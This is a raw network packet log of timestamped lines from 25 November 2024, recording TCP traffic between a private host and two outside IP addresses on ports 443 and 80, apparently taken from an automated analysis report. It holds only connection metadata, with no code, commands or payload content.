                                                                                                                                                                                Nov 25, 2024 14:07:19.595727921 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.595736980 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.599670887 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.599680901 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.599751949 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.599751949 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.599761963 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.602893114 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.602921009 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.602958918 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.602967024 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.603004932 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.606432915 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.606441975 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.606498003 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.606509924 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.609698057 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.609765053 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.609782934 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.613612890 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.613682032 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.613689899 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.616753101 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.616818905 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.616827011 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.619911909 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.619983912 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.619992018 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.624108076 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.624176025 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.624186993 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.695229053 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:19.763488054 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.763626099 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.763643026 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.767484903 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.767499924 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.767524004 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.767550945 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.767563105 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.767616987 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.770740032 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.770752907 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.770776987 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.770804882 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.770816088 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.773801088 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.773814917 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.773832083 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.773883104 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.777914047 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.777929068 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.777972937 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.777983904 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.778028011 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.781075954 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.781091928 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.781112909 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.781132936 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.781145096 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.784223080 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.784235001 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.784252882 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.784282923 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.784297943 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.788518906 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.788533926 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.788580894 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.788589954 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.791460991 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.791493893 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.791517973 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.189893961 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.189976931 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.189991951 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.193011999 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.193085909 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.193099022 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.197138071 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.197204113 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.197215080 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.200315952 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.200390100 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.200406075 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.340097904 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.340183973 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.340219021 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.344129086 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.344136953 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.344160080 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.344192028 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.344213009 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.344278097 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.347335100 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.347342968 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.347364902 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.347398996 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.347409964 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.351284027 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.351293087 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.351320028 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.351357937 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.352811098 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.354562044 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.354569912 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.354593039 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.354609013 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.354624987 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.357656956 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.357665062 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.357686043 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.357712984 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.357724905 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.361677885 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.361685991 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.361751080 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.361758947 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.365009069 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.365019083 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.365094900 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.365108013 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.368119001 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.368128061 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.368175030 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.368185043 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.371634960 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.371675014 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.371695995 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.371709108 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.371754885 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.375653982 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.375660896 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.375704050 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.375711918 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.378772974 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.378833055 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.378839970 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.381999016 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.382060051 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.382071018 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.386019945 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.386077881 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.386090040 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.389254093 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.389311075 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.389328003 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.392431974 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.392488003 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.392499924 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.533004999 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.533138037 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.533153057 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.536217928 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.536226034 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.536259890 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.536279917 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.536288977 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.536343098 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.539297104 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.539304972 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.539344072 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.539361000 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.539397955 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.543311119 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.543323994 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.543354988 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.543380976 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.543411016 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.546614885 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.546623945 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.546653032 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.546691895 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.546691895 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.549683094 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.549690962 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.549716949 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.549757957 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.549843073 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.553716898 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.553725004 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.553781986 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.553791046 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.556900024 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.556909084 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.556972027 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.949624062 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.949687958 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.949703932 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.951981068 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.952049017 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.952061892 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.952094078 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.952136993 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.952749968 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:21.062067032 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.062160969 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.062175035 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.066318035 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.066328049 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.066485882 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.132560015 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.132734060 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.132793903 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.136888027 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.137023926 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.137085915 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.144006014 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.144172907 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.144232035 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.152465105 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.152477980 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.152539015 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.160747051 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.160861015 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.160917997 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.169080973 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.169274092 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.169325113 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.177540064 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.177637100 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.177762985 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.186323881 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.186414957 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.186467886 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.194323063 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.194391966 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.194439888 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.202862978 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.202923059 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.202980995 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.211195946 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.211209059 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.211256981 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.217858076 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.217962027 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.218007088 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.324409008 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.324486017 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.324561119 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.325397015 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.325520039 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.325567007 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.329531908 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.329590082 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.329638958 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.333515882 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.333620071 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.333667040 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.337735891 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.337902069 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.337949991 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.342227936 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.342322111 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.342370033 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.346590042 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.346707106 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.346751928 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.351037979 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.351191998 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.351246119 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.355515957 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.355530977 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.355570078 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.359941959 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.360050917 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.360097885 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.364617109 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.364782095 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.364833117 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.370023966 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.370044947 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.370091915 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.374682903 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.374780893 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.374830008 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.378892899 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.379173994 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.379234076 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.383419991 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.383579016 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.383632898 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.387284994 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.387492895 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.387548923 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.391412973 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.391488075 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.391531944 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.515105963 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.515212059 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.515269995 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.516870022 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.517033100 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.517082930 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.520493031 CET8049173172.234.205.135192.168.2.22
